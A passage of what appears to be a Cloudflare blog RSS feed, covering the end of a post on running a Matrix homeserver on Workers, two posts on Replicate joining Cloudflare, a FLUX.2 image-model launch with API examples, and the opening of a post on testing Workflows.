    <p>Achieving post-quantum TLS on a traditional Matrix deployment would require upgrading OpenSSL or BoringSSL to a version supporting ML-KEM, configuring cipher suite preferences correctly, testing client compatibility across all Matrix apps, monitoring for TLS negotiation failures, staying current as PQC standards evolve, and handling clients that don’t support PQC gracefully.</p><p>With Workers, it’s automatic. Chrome, Firefox, and Edge all support X25519MLKEM768. Mobile apps using platform TLS stacks inherit this support. The security posture improves as Cloudflare’s <a href="https://developers.cloudflare.com/ssl/post-quantum-cryptography/"><u>PQC</u></a> deployment expands — no action required on our part.</p>
    <div>
      <h2>The storage architecture that made it work</h2>
      <a href="#the-storage-architecture-that-made-it-work">
        
      </a>
    </div>
    <p>The key insight from porting Tuwunel was that different data needs different consistency guarantees. We use each Cloudflare primitive for what it does best.</p>
    <div>
      <h3>D1 for the data model</h3>
      <a href="#d1-for-the-data-model">
        
      </a>
    </div>
    <p>D1 stores everything that needs to survive restarts and support queries: users, rooms, events, device keys. Over 25 tables covering the full Matrix data model. </p>
            <pre><code>CREATE TABLE events (
	event_id TEXT PRIMARY KEY,
	room_id TEXT NOT NULL,
	sender TEXT NOT NULL,
	event_type TEXT NOT NULL,
	state_key TEXT,
	content TEXT NOT NULL,
	origin_server_ts INTEGER NOT NULL,
	depth INTEGER NOT NULL
);
</code></pre>
            <p><a href="https://www.cloudflare.com/developer-platform/products/d1/">D1’s SQLite foundation</a> meant we could port Tuwunel’s queries with minimal changes. Joins, indexes, and aggregations work as expected.</p><p>We learned one hard lesson: D1’s eventual consistency breaks foreign key constraints. A write to rooms might not be visible when a subsequent write to events checks the foreign key. We removed all foreign keys and enforce referential integrity in application code.</p>
    <div>
      <h3>KV for ephemeral state</h3>
      <a href="#kv-for-ephemeral-state">
        
      </a>
    </div>
    <p>OAuth authorization codes live for 10 minutes, while refresh tokens last for a session.</p>
            <pre><code>// Store OAuth code with 10-minute TTL
kv.put(&amp;format!("oauth_code:{}", code), &amp;token_data)?
	.expiration_ttl(600)
	.execute()
	.await?;</code></pre>
            <p>KV’s global distribution means OAuth flows work fast regardless of where users are located.</p>
    <div>
      <h3>R2 for media</h3>
      <a href="#r2-for-media">
        
      </a>
    </div>
    <p>Matrix media maps directly to R2, so you can upload an image, get back a content-addressed URL – and egress is free.</p>
    <div>
      <h3>Durable Objects for atomicity</h3>
      <a href="#durable-objects-for-atomicity">
        
      </a>
    </div>
    <p>Some operations can’t tolerate eventual consistency. When a client claims a one-time encryption key, that key must be atomically removed. If two clients claim the same key, encrypted session establishment fails.</p><p>Durable Objects provide single-threaded, strongly consistent storage:</p>
            <pre><code>#[durable_object]
pub struct UserKeysObject {
	state: State,
	env: Env,
}

impl UserKeysObject {
	async fn claim_otk(&amp;self, algorithm: &amp;str) -&gt; Result&lt;Option&lt;Key&gt;&gt; {
    	// Atomic within single DO - no race conditions possible
    	let mut keys: Vec&lt;Key&gt; = self.state.storage()
        	.get("one_time_keys")
        	.await
        	.ok()
        	.flatten()
        	.unwrap_or_default();

    	if let Some(idx) = keys.iter().position(|k| k.algorithm == algorithm) {
        	let key = keys.remove(idx);
        	self.state.storage().put("one_time_keys", &amp;keys).await?;
        	return Ok(Some(key));
    	}
    	Ok(None)
	}
}</code></pre>
            <p>We use UserKeysObject for E2EE key management, RoomObject for real-time room events like typing indicators and read receipts, and UserSyncObject for to-device message queues. The rest flows through D1.</p>
    <div>
      <h3>Complete end-to-end encryption, complete OAuth</h3>
      <a href="#complete-end-to-end-encryption-complete-oauth">
        
      </a>
    </div>
    <p>Our implementation supports the full Matrix E2EE stack: device keys, cross-signing keys, one-time keys, fallback keys, key backup, and dehydrated devices.</p><p>Modern Matrix clients use OAuth 2.0/OIDC instead of legacy password flows. We implemented a complete OAuth provider, with dynamic client registration, PKCE authorization, RS256-signed JWT tokens, token refresh with rotation, and standard OIDC discovery endpoints.
</p>
            <pre><code>curl https://matrix.example.com/.well-known/openid-configuration
{
  "issuer": "https://matrix.example.com",
  "authorization_endpoint": "https://matrix.example.com/oauth/authorize",
  "token_endpoint": "https://matrix.example.com/oauth/token",
  "jwks_uri": "https://matrix.example.com/.well-known/jwks.json"
}
</code></pre>
            <p>Point Element or any Matrix client at the domain, and it discovers everything automatically.</p>
    <div>
      <h2>Sliding Sync for mobile</h2>
      <a href="#sliding-sync-for-mobile">
        
      </a>
    </div>
    <p>Traditional Matrix sync transfers megabytes of data on initial connection,  draining mobile battery and data plans.</p><p>Sliding Sync lets clients request exactly what they need. Instead of downloading everything, clients get the 20 most recent rooms with minimal state. As users scroll, they request more ranges. The server tracks position and sends only deltas.</p><p>Combined with edge execution, mobile clients can connect and render their room list in under 500ms, even on slow networks.</p>
    <div>
      <h2>The comparison</h2>
      <a href="#the-comparison">
        
      </a>
    </div>
    <p>For a homeserver serving a small team:</p><table><tr><th><p> </p></th><th><p><b>Traditional (VPS)</b></p></th><th><p><b>Workers</b></p></th></tr><tr><td><p>Monthly cost (idle)</p></td><td><p>$20-50</p></td><td><p>&lt;$1</p></td></tr><tr><td><p>Monthly cost (active)</p></td><td><p>$20-50</p></td><td><p>$3-10</p></td></tr><tr><td><p>Global latency</p></td><td><p>100-300ms</p></td><td><p>20-50ms</p></td></tr><tr><td><p>Time to deploy</p></td><td><p>Hours</p></td><td><p>Seconds</p></td></tr><tr><td><p>Maintenance</p></td><td><p>Weekly</p></td><td><p>None</p></td></tr><tr><td><p>DDoS protection</p></td><td><p>Additional cost</p></td><td><p>Included</p></td></tr><tr><td><p>Post-quantum TLS</p></td><td><p>Complex setup</p></td><td><p>Automatic</p></td></tr></table><p><sup>*</sup><sup><i>Based on public rates and metrics published by DigitalOcean, AWS Lightsail, and Linode as of January 15, 2026.</i></sup></p><p>The economics improve further at scale. Traditional deployments require capacity planning and over-provisioning. Workers scale automatically.</p>
    <div>
      <h2>The future of decentralized protocols</h2>
      <a href="#the-future-of-decentralized-protocols">
        
      </a>
    </div>
    <p>We started this as an experiment: could Matrix run on Workers? It can—and the approach can work for other stateful protocols, too.</p><p>By mapping traditional stateful components to Cloudflare’s primitives — Postgres to D1, Redis to KV, mutexes to Durable Objects — we can see  that complex applications don't need complex infrastructure. We stripped away the operating system, the database management, and the network configuration, leaving only the application logic and the data itself.</p><p>Workers offers the sovereignty of owning your data, without the burden of owning the infrastructure.</p><p>I have been experimenting with the implementation and am excited for any contributions from others interested in this kind of service. </p><p>Ready to build powerful, real-time applications on Workers? Get started with<a href="https://developers.cloudflare.com/workers/"> <u>Cloudflare Workers</u></a> and explore<a href="https://developers.cloudflare.com/durable-objects/"> <u>Durable Objects</u></a> for your own stateful edge applications. Join our<a href="https://discord.cloudflare.com"> <u>Discord community</u></a> to connect with other developers building at the edge.</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Durable Objects]]></category>
            <category><![CDATA[D1]]></category>
            <category><![CDATA[Cloudflare Workers KV]]></category>
            <category><![CDATA[R2]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[WebAssembly]]></category>
            <category><![CDATA[Post-Quantum]]></category>
            <category><![CDATA[Encryption]]></category>
            <guid isPermaLink="false">6VOVAMNwIZ18hMaUlC6aqp</guid>
            <dc:creator>Nick Kuntz</dc:creator>
        </item>
        <item>
            <title><![CDATA[Why Replicate is joining Cloudflare]]></title>
            <link>https://blog.cloudflare.com/why-replicate-joining-cloudflare/</link>
            <pubDate>Mon, 01 Dec 2025 06:00:00 GMT</pubDate>
            <description><![CDATA[ Today, we’re excited to announce that Replicate is officially part of Cloudflare. We wanted to share a bit about our journey and why we made this decision.  ]]></description>
            <content:encoded><![CDATA[ <p></p><p></p><p>We're happy to announce that as of today Replicate is officially part of Cloudflare.</p><p>When we started Replicate in 2019, OpenAI had just open sourced GPT-2, and few people outside of the machine learning community paid much attention to AI. But for those of us in the field, it felt like something big was about to happen. Remarkable models were being created in academic labs, but you needed a metaphorical lab coat to be able to run them.</p><p>We made it our mission to get research models out of the lab into the hands of developers. We wanted programmers to creatively bend and twist these models into products that the researchers would never have thought of.</p><p>We approached this as a tooling problem. Just like tools like Heroku made it possible to run websites without managing web servers, we wanted to build tools for running models without having to understand backpropagation or deal with CUDA errors.</p><p>The first tool we built was <a href="https://github.com/replicate/cog"><u>Cog</u></a>: a standard packaging format for machine learning models. Then we built <a href="https://replicate.com/"><u>Replicate</u></a> as the platform to run Cog models as API endpoints in the cloud. We abstracted away both the low-level machine learning, and the complicated GPU cluster management you need to run inference at scale.</p><p>It turns out the timing was just right. When <a href="https://replicate.com/stability-ai/stable-diffusion"><u>Stable Diffusion</u></a> was released in 2022 we had mature infrastructure that could handle the massive developer interest in running these models. A ton of fantastic apps and products were built on Replicate, apps that often ran a single model packaged in a slick UI to solve a particular use case.</p><p>Since then, <a href="https://www.latent.space/p/ai-engineer"><i><u>AI Engineering</u></i></a> has matured into a serious craft. AI apps are no longer just about running models. The modern AI stack has model inference, but also microservices, content delivery, <a href="https://www.cloudflare.com/learning/cloud/what-is-object-storage/">object storage</a>, caching, databases, telemetry, etc. We see many of our customers building complex heterogenous stacks where the Replicate models are one part of a higher-order system across several platforms.</p><p><i>This is why we’re joining Cloudflare</i>. Replicate has the tools and primitives for running models. Cloudflare has the best network, Workers, <a href="https://www.cloudflare.com/developer-platform/products/r2/">R2</a>, Durable Objects, and all the other primitives you need to build a full AI stack.</p><p>The AI stack lives entirely on the network. Models run on data center GPUs and are glued together by small cloud functions that call out to vector databases, fetch objects from blob storage, call MCP servers, etc. “<a href="https://blog.cloudflare.com/the-network-is-the-computer/"><u>The network is the computer</u></a>” has never been more true.</p><p>At Cloudflare, we’ll now be able to build the AI infrastructure layer we have dreamed of since we started. We’ll be able to do things like run fast models on the edge, run model pipelines on instantly-booting Workers, stream model inputs and outputs with WebRTC, etc.</p><p>We’re proud of what we’ve built at Replicate. We were the first generative AI serving platform, and we defined the abstractions and design patterns that most of our peers have adopted. We’ve grown a wonderful community of builders and researchers around our product.</p> ]]></content:encoded>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Acquisitions]]></category>
            <guid isPermaLink="false">3KkAemgmCHkd0D9QW5qTnz</guid>
            <dc:creator>Andreas Jansson</dc:creator>
            <dc:creator>Ben Firshman</dc:creator>
        </item>
        <item>
            <title><![CDATA[Partnering with Black Forest Labs to bring FLUX.2 [dev] to Workers AI]]></title>
            <link>https://blog.cloudflare.com/flux-2-workers-ai/</link>
            <pubDate>Tue, 25 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[ FLUX.2 [dev] by Black Forest Labs is now on Workers AI! This advanced open-weight image model offers superior photorealism, multi-reference inputs, and granular control with JSON prompting. ]]></description>
            <content:encoded><![CDATA[ <p>In recent months, we’ve seen a leap forward for closed-source image generation models with the rise of <a href="https://gemini.google/overview/image-generation/"><u>Google’s Nano Banana</u></a> and <a href="https://openai.com/index/image-generation-api/"><u>OpenAI image generation models</u></a>. Today, we’re happy to share that a new open-weight contender is back with the launch of Black Forest Lab’s FLUX.2 [dev] and available to run on Cloudflare’s inference platform, Workers AI. You can read more about this new model in detail on BFL’s blog post about their new model launch <a href="https://bfl.ai/blog/flux-2"><u>here</u></a>. </p><p>We have been huge fans of Black Forest Lab’s FLUX image models since their earliest versions. Our hosted version of FLUX.1 [schnell] is one of the most popular models in our catalog for its photorealistic outputs and high-fidelity generations. When the time came to host the licensed version of their new model, we jumped at the opportunity. The FLUX.2 model takes all the best features of FLUX.1 and amps it up, generating even more realistic, grounded images with added customization support like JSON prompting.</p><p>Our Workers AI hosted version of FLUX.2 has some specific patterns, like using multipart form data to support input images (up to 4 512x512 images), and output images up to 4 megapixels. The multipart form data format allows users to send us multiple image inputs alongside the typical model parameters. Check out our <a href="https://developers.cloudflare.com/changelog/2025-11-25-flux-2-dev-workers-ai/"><u>developer docs changelog announcement</u></a> to understand how to use the FLUX.2 model.</p>
    <div>
      <h2>What makes FLUX.2 special? Physical world grounding, digital world assets, and multi-language support</h2>
      <a href="#what-makes-flux-2-special-physical-world-grounding-digital-world-assets-and-multi-language-support">
        
      </a>
    </div>
    <p>The FLUX.2 model has a more robust understanding of the physical world, allowing you to turn abstract concepts into photorealistic reality. It excels at generating realistic image details and consistently delivers accurate hands, faces, fabrics, logos, and small objects that are often missed by other models. Its knowledge of the physical world also generates life-like lighting, angles and depth perception.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3tOCj8UT98MbcvlXFe8EMl/ad6d94d8b4713453dcd2455a9a3ad331/image3.png" />
          </figure><p><sup>Figure 1. Image generated with FLUX.2 featuring accurate lighting, shadows, reflections and depth perception at a café in Paris.</sup></p><p>This high-fidelity output makes it ideal for applications requiring superior image quality, such as creative photography, e-commerce product shots, marketing visuals, and interior design. Because it can understand context, tone, and trends, the model allows you to create engaging and editorial-quality digital assets from short prompts.</p><p>Aside from the physical world, the model is also able to generate high-quality digital assets such as designing landing pages or generating detailed infographics (see below for example). It’s also able to understand multiple languages naturally, so combining these two features – we can get a beautiful landing page in French from a French prompt.</p>
            <pre><code>Générer une page web visuellement immersive pour un service de promenade de chiens. L'image principale doit dominer l'écran, montrant un chien exubérant courant dans un parc ensoleillé, avec des touches de vert vif (#2ECC71) intégrées subtilement dans le feuillage ou les accessoires du chien. Minimiser le texte pour un impact visuel maximal.</code></pre>
            
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3C9EEp5jsISYMrOsC4NKb/12e0630b51334feb02a5be805e767d08/image8.png" />
          </figure>
    <div>
      <h2>Character consistency – solving for stochastic drift</h2>
      <a href="#character-consistency-solving-for-stochastic-drift">
        
      </a>
    </div>
    <p>FLUX.2 offers multi-reference editing with state-of-the-art character consistency, ensuring identities, products, and styles remain consistent for tasks. In the world of generative AI, getting a high-quality image is easy. However, getting the <i>exact same</i> character or product twice has always been the hard part. This is a phenomenon known as "stochastic drift", where generated images drift away from the original source material.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/58T8pavXCsWneWxEDfKgte/a821df53fa3a86d577dd72e3c285fe8a/image9.png" />
          </figure><p><sup>Figure 2. Stochastic drift infographic (generated on FLUX.2)</sup></p><p>One of FLUX.2’s<b> </b>breakthroughs is multi-reference image inputs designed to solve this consistency challenge. You’ll have the ability to change the background, lighting, or pose of an image without accidentally changing the face of your model or the design of your product. You can also reference other images or combine multiple images together to create something new. </p><p>In code, Workers AI supports multi-reference images (up to 4) with a multipart form-data upload. The image inputs are binary images and output is a base64 encoded image:</p>
            <pre><code>curl --request POST \
  --url 'https://api.cloudflare.com/client/v4/accounts/{ACCOUNT}/ai/run/@cf/black-forest-labs/flux-2-dev' \
  --header 'Authorization: Bearer {TOKEN}' \
  --header 'Content-Type: multipart/form-data' \
  --form 'prompt=take the subject of image 2 and style it like image 1' \
  --form input_image_0=@/Users/johndoe/Desktop/icedoutkeanu.png \
  --form input_image_1=@/Users/johndoe/Desktop/me.png \
  --form steps=25
  --form width=1024
  --form height=1024</code></pre>
            <p>We also support this through the Workers AI Binding:</p>
            <pre><code>const image = await fetch("http://image-url");
const form = new FormData();
 
const image_blob = await streamToBlob(image.body, "image/png");
form.append('input_image_0', image_blob)
form.append('prompt', 'a sunset with the dog in the original image')
 
const resp = await env.AI.run("@cf/black-forest-labs/flux-2-dev", {
    multipart: {
        body: form,
        contentType: "multipart/form-data"
    }
})</code></pre>
            
    <div>
      <h3>Built for real world use cases</h3>
      <a href="#built-for-real-world-use-cases">
        
      </a>
    </div>
    <p>The newest image model signifies a shift towards functional business use cases, moving beyond simple image quality improvements. FLUX.2 enables you to:</p><ul><li><p><b>Create Ad Variations:</b> Generate 50 different advertisements using the exact same actor, without their face morphing between frames.</p></li><li><p><b>Trust Your Product Shots:</b> Drop your product on a model, or into a beach scene, a city street, or a studio table. The environment changes, but your product stays accurate.</p></li><li><p><b>Build Dynamic Editorials:</b> Produce a full fashion spread where the model looks identical in every single shot, regardless of the angle.</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Me4jErrBPSW7kAx8qecId/22b2c98a8661489ebe45188cb7947381/image6.png" />
          </figure><p><sup>Figure 3. Combining the oversized hoodie and sweatpant ad photo (generated with FLUX.2) with Cloudflare’s logo to create product renderings with consistent faces, fabrics, and scenery. **</sup><sup><i>Note: we prompted for white Cloudflare font as well instead of the original black font. </i></sup></p>
    <div>
      <h2>Granular controls — JSON prompting, HEX codes and more!</h2>
      <a href="#granular-controls-json-prompting-hex-codes-and-more">
        
      </a>
    </div>
    <p>The FLUX.2 model makes another advancement by allowing users to control small details in images through tools like JSON prompting and specifying specific hex codes.</p><p>For example, you could send this JSON as a prompt (as part of the multipart form input) and the resulting image follows the prompt exactly:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5hnd2lQHC8kqKGbEFqdsgb/de72f15c9e3ede2fcfa717c013a4cba4/image4.jpg" />
          </figure>
            <pre><code>{
  "scene": "A bustling, neon-lit futuristic street market on an alien planet, rain slicking the metal ground",
  "subjects": [
    {
      "type": "Cyberpunk bounty hunter",
      "description": "Female, wearing black matte armor with glowing blue trim, holding a deactivated energy rifle, helmet under her arm, rain dripping off her synthetic hair",
      "pose": "Standing with a casual but watchful stance, leaning slightly against a glowing vendor stall",
      "position": "foreground"
    },
    {
      "type": "Merchant bot",
      "description": "Small, rusted, three-legged drone with multiple blinking red optical sensors, selling glowing synthetic fruit from a tray attached to its chassis",
      "pose": "Hovering slightly, offering an item to the viewer",
      "position": "midground"
    }
  ],
  "style": "noir sci-fi digital painting",
  "color_palette": [
    "deep indigo",
    "electric blue",
    "acid green"
  ],
  "lighting": "Low-key, dramatic, with primary light sources coming from neon signs and street lamps reflecting off wet surfaces",
  "mood": "Gritty, tense, and atmospheric",
  "background": "Towering, dark skyscrapers disappearing into the fog, with advertisements scrolling across their surfaces, flying vehicles (spinners) visible in the distance",
  "composition": "dynamic off-center",
  "camera": {
    "angle": "eye level",
    "distance": "medium close-up",
    "focus": "sharp on subject",
    "lens": "35mm",
    "f-number": "f/1.4",
    "ISO": 400
  },
  "effects": [
    "heavy rain effect",
    "subtle film grain",
    "neon light reflections",
    "mild chromatic aberration"
  ]
}</code></pre>
            <p>To take it further, we can ask the model to recolor the accent lighting to a Cloudflare orange by giving it a specific hex code like #F48120.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/79EL6Y3YGu8PqvWauHyqzh/29684aa0f4bb9b4306059e1634b5b94c/image1.jpg" />
          </figure>
    <div>
      <h2>Try it out today!</h2>
      <a href="#try-it-out-today">
        
      </a>
    </div>
    <p>The newest FLUX.2 [dev] model is now available on Workers AI — you can get started with the model through our <a href="http://developers.cloudflare.com/workers-ai/models/flux-2-dev"><u>developer docs</u></a> or test it out on our <a href="https://multi-modal.ai.cloudflare.com/"><u>multimodal playground.</u></a></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/49KKiYwNbkrRaiDRruKCck/66cdcb3b41f8a87fd44a240e05bd851a/image2.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Developers]]></category>
            <guid isPermaLink="false">5lE1GkcjJWDeQq5696TdSs</guid>
            <dc:creator>Michelle Chen</dc:creator>
            <dc:creator>David Liu</dc:creator>
        </item>
        <item>
            <title><![CDATA[Replicate is joining Cloudflare]]></title>
            <link>https://blog.cloudflare.com/replicate-joins-cloudflare/</link>
            <pubDate>Mon, 17 Nov 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Bringing Replicate’s tools into Cloudflare will continue to make our Workers Platform the best place on the Internet to build and deploy any AI or agentic workflow.
 ]]></description>
            <content:encoded><![CDATA[ <p></p><p>We have some big news to share today: Replicate, the leading platform for running AI models, is joining Cloudflare.</p><p>We first started talking to Replicate because we shared a lot in common beyond just a passion for bright color palettes. Our mission for Cloudflare’s Workers developer platform has been to make building and deploying full-stack applications as easy as possible. Meanwhile, Replicate has been on a similar mission to make deploying AI models as easy as writing a single line of code. And we realized we could build something even better together by integrating the Replicate platform into Cloudflare directly.</p><p>We are excited to share this news and even more excited for what it will mean for customers. Bringing Replicate’s tools into Cloudflare will continue to make our Developer Platform the best place on the Internet to build and deploy any AI or agentic workflow.</p>
    <div>
      <h2>What does this mean for you? </h2>
      <a href="#what-does-this-mean-for-you">
        
      </a>
    </div>
    <p>Before we spend more time talking about the future of AI, we want to answer the questions that are top of mind for Replicate and Cloudflare users. In short: </p><p><b>For existing Replicate users:</b> Your APIs and workflows will continue to work without interruption. You will soon benefit from the added performance and reliability of Cloudflare's global network.</p><p><b>For existing Workers AI users:</b> Get ready for a massive expansion of the model catalog and the new ability to run fine-tunes and custom models directly on Workers AI.</p><p>Now – let’s get back into why we’re so excited about our joint future.</p>
    <div>
      <h2>The AI Revolution was not televised, but it started with open source</h2>
      <a href="#the-ai-revolution-was-not-televised-but-it-started-with-open-source">
        
      </a>
    </div>
    <p>Before AI was AI, and the subject of <i>every</i> conversation, it was known for decades as “machine learning”. It was a specialized, almost academic field. Progress was steady but siloed, with breakthroughs happening inside a few large, well-funded research labs. The models were monolithic, the data was proprietary, and the tools were inaccessible to most developers. Everything changed when the culture of open-source collaboration — the same force that built the modern Internet — collided with machine learning, as researchers and companies began publishing not just their papers, but their model weights and code.</p><p>This ignited an incredible explosion of innovation. The pace of change in just the past few years has been staggering; what was state-of-the-art 18 months ago (or sometimes it feels like just days ago) is now the baseline. This acceleration is most visible in generative AI. </p><p>We went from uncanny, blurry curiosities to photorealistic image generation in what felt like the blink of an eye. Open source models like Stable Diffusion unlocked immediate creativity for developers, and that was just the beginning. If you take a look at Replicate’s model catalog today, you’ll see thousands of image models of almost every flavor, each iterating on the previous. </p><p>This happened not just with image models, but video, audio, language models and more…. </p><p>But this incredible, community-driven progress creates a massive practical challenge: How do you actually <i>run</i> these models? Every new model has different dependencies, requires specific GPU hardware (and enough of it), and needs a complex serving infrastructure to scale. Developers found themselves spending more time fighting with CUDA drivers and requirements.txt files than actually building their applications.</p><p>This is exactly the problem Replicate solved. They built a platform that abstracts away all that complexity (using their open-source tool <a href="https://github.com/replicate/cog"><u>Cog</u></a> to package models into standard, reproducible containers), letting any developer or data scientist run even the most complex open-source models with a simple API call. </p><p>Today, Replicate’s catalog spans more than 50,000 open-source models and fine-tuned models. While open source unlocked so many possibilities, Replicate’s toolset goes beyond that to make it possible for developers to access any models they need in one place. Period. With their marketplace, they also offer seamless access to leading proprietary models like GPT-5 and Claude Sonnet, all through the same unified API.</p><p>What’s worth noting is that Replicate didn't just build an inference service; they built a <b>community</b>. So much innovation happens through being inspired by what others are doing, iterating on it, and making it better. Replicate has become the definitive hub for developers to discover, share, fine-tune, and experiment with the latest models in a public playground. </p>
    <div>
      <h2>Stronger together: the AI catalog meets the AI cloud</h2>
      <a href="#stronger-together-the-ai-catalog-meets-the-ai-cloud">
        
      </a>
    </div>
    <p>Coming back to the Workers Platform mission: Our goal all along has been to enable developers to build full-stack applications without having to burden themselves with infrastructure. And while that hasn’t changed, AI has changed the requirements of applications.</p><p>The types of applications developers are building are changing — three years ago, no one was building agents or creating AI-generated launch videos. Today they are. As a result, what they need and expect from the cloud, or the <b>AI cloud</b>, has changed too.</p><p>To meet the needs of developers, Cloudflare has been building the foundational pillars of the AI Cloud, designed to run inference at the edge, close to users. This isn't just one product, but an entire stack:</p><ul><li><p><b>Workers AI:</b> Serverless GPU inference on our global network.</p></li><li><p><b>AI Gateway:</b> A control plane for caching, rate-limiting, and observing any AI API.</p></li><li><p><b>Data Stack:</b> Including Vectorize (our vector database) and R2 (for model and data storage).</p></li><li><p><b>Orchestration:</b> Tools like AI Search (formerly Autorag), Agents, and Workflows to build complex, multi-step applications.</p></li><li><p><b>Foundation:</b> All built on our core developer platform of Workers, Durable Objects, and the rest of our stack.</p></li></ul><p>As we’ve been helping developers scale up their applications, Replicate has been on a similar mission — to make deploying AI models as easy as deploying code. This is where it all comes together. Replicate brings one of the industry's largest and most vibrant <b>model catalog and developer community</b>. Cloudflare brings an incredibly performant <b>global network and serverless inference platform</b>. Together, we can deliver the best of both worlds: the most comprehensive selection of models, runnable on a fast, reliable, and affordable inference platform.</p>
    <div>
      <h2>Our shared vision</h2>
      <a href="#our-shared-vision">
        
      </a>
    </div>
    
    <div>
      <h3>For the community: the hub for AI exploration</h3>
      <a href="#for-the-community-the-hub-for-ai-exploration">
        
      </a>
    </div>
    <p>The ability to share models, publish fine-tunes, collect stars, and experiment in the playground is the heart of the Replicate community. We will continue to invest in and grow this as the premier destination for AI discovery and experimentation, now <b>supercharged by Cloudflare's global network</b> for an even faster, more responsive experience for everyone.</p>
    <div>
      <h3>The future of inference: one platform, all models</h3>
      <a href="#the-future-of-inference-one-platform-all-models">
        
      </a>
    </div>
    <p>Our vision is to bring the best of both platforms together. We will bring the entire Replicate catalog — all 50,000+ models and fine-tunes — to Workers AI. This gives you the ultimate choice: run models in Replicate's flexible environment or on Cloudflare's serverless platform, all from one place.</p><p>But we're not just expanding the catalog. We are thrilled to announce that we will be bringing fine-tuning capabilities to Workers AI, powered by Replicate's deep expertise. We are also making Workers AI more flexible than ever. Soon, you'll be able to <b>bring your own custom models</b> to our network. We'll leverage Replicate's expertise with <b>Cog</b> to make this process seamless, reproducible, and easy.</p>
    <div>
      <h3>The AI Cloud: more than just inference</h3>
      <a href="#the-ai-cloud-more-than-just-inference">
        
      </a>
    </div>
    <p>Running a model is just one piece of the puzzle. The real magic happens when you connect AI to your entire application. Imagine what you can build when Replicate's massive catalog is deeply integrated with the entire Cloudflare developer platform: run a model and store the results directly in <b>R2</b> or <b>Vectorize</b>; trigger inference from a <b>Worker</b> or <b>Queue</b>; use <b>Durable Objects</b> to manage state for an AI agent; or build real-time generative UI with <b>WebRTC</b> and WebSockets.</p><p>To manage all this, we will integrate our unified inference platform deeply with the <b>AI Gateway</b>, giving you a single control plane for <a href="https://www.cloudflare.com/learning/performance/what-is-observability/">observability</a>, prompt management, A/B testing, and cost analytics across <i>all</i> your models, whether they're running on Cloudflare, Replicate, or any other provider.</p>
    <div>
      <h2>Welcome to the team!</h2>
      <a href="#welcome-to-the-team">
        
      </a>
    </div>
    <p>We are incredibly excited to welcome the Replicate team to Cloudflare. Their passion for the developer community and their expertise in the AI ecosystem are unmatched. We can't wait to build the future of AI together.</p> ]]></content:encoded>
            <category><![CDATA[Acquisitions]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">5wrXGTWWVegEdBSpstdIhb</guid>
            <dc:creator>Rita Kozlov</dc:creator>
            <dc:creator>Ben Firshman</dc:creator>
        </item>
        <item>
            <title><![CDATA[Building a better testing experience for Workflows, our durable execution engine for multi-step applications]]></title>
            <link>https://blog.cloudflare.com/better-testing-for-workflows/</link>
            <pubDate>Tue, 04 Nov 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ End-to-end testing for Cloudflare Workflows was challenging. We're introducing first-class support for Workflows in cloudflare:test, enabling full introspection, mocking, and isolated, reliable tests for your most complex applications. ]]></description>
            <content:encoded><![CDATA[ <p></p><p><a href="https://www.cloudflare.com/developer-platform/products/workflows/"><u>Cloudflare Workflows</u></a> is our take on "Durable Execution." They provide a serverless engine, powered by the <a href="https://www.cloudflare.com/developer-platform/"><u>Cloudflare Developer Platform</u></a>, for building long-running, multi-step applications that persist through failures. When Workflows became <a href="https://blog.cloudflare.com/workflows-ga-production-ready-durable-execution/"><u>generally available</u></a> earlier this year, they allowed developers to orchestrate complex processes that would be difficult or impossible to manage with traditional stateless functions. Workflows handle state, retries, and long waits, allowing you to focus on your business logic.</p><p>However, complex orchestrations require robust testing to be reliable. To date, testing Workflows was a black-box process. Although you could test if a Workflow instance reached completion through an <code>await</code> to its status, there was no visibility into the intermediate steps. This made debugging really difficult. Did the payment processing step succeed? Did the confirmation email step receive the correct data? You couldn't be sure without inspecting external systems or logs. </p>
    <div>
      <h3>Why was this necessary?</h3>
      <a href="#why-was-this-necessary">
        
      </a>
    </div>
    <p>As developers ourselves, we understand the need to ensure reliable code, and we heard your feedback loud and clear: the developer experience for testing Workflows needed to be better.</p><p>The black box nature of testing was one part of the problem. Beyond that, though, the limited testing offered came at a high cost. If you added a workflow to your project, even if you weren't testing the workflow directly, you were required to disable isolated storage because we couldn't guarantee isolation between tests. Isolated storage is a vitest-pool-workers feature to guarantee that each test runs in a clean, predictable environment, free from the side effects of other tests. Being forced to have it disabled meant that state could leak between tests, leading to flaky, unpredictable, and hard-to-debug failures.</p><p>This created a difficult choice for developers building complex applications. If your project used <a href="https://www.cloudflare.com/developer-platform/products/workers/"><u>Workers</u></a>, <a href="https://www.cloudflare.com/developer-platform/products/durable-objects/"><u>Durable Objects</u></a>, and <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a> alongside Workflows, you had to either abandon isolated testing for your <i>entire project</i> or skip testing. This friction resulted in a poor testing experience, which in turn discouraged the adoption of Workflows. Solving this wasn't just an improvement, it was a critical <i>step</i> in making Workflows part of any well-tested Cloudflare application.</p>
    <div>
      <h3>Introducing isolated testing for Workflows</h3>
      <a href="#introducing-isolated-testing-for-workflows">
        
      </a>
    </div>
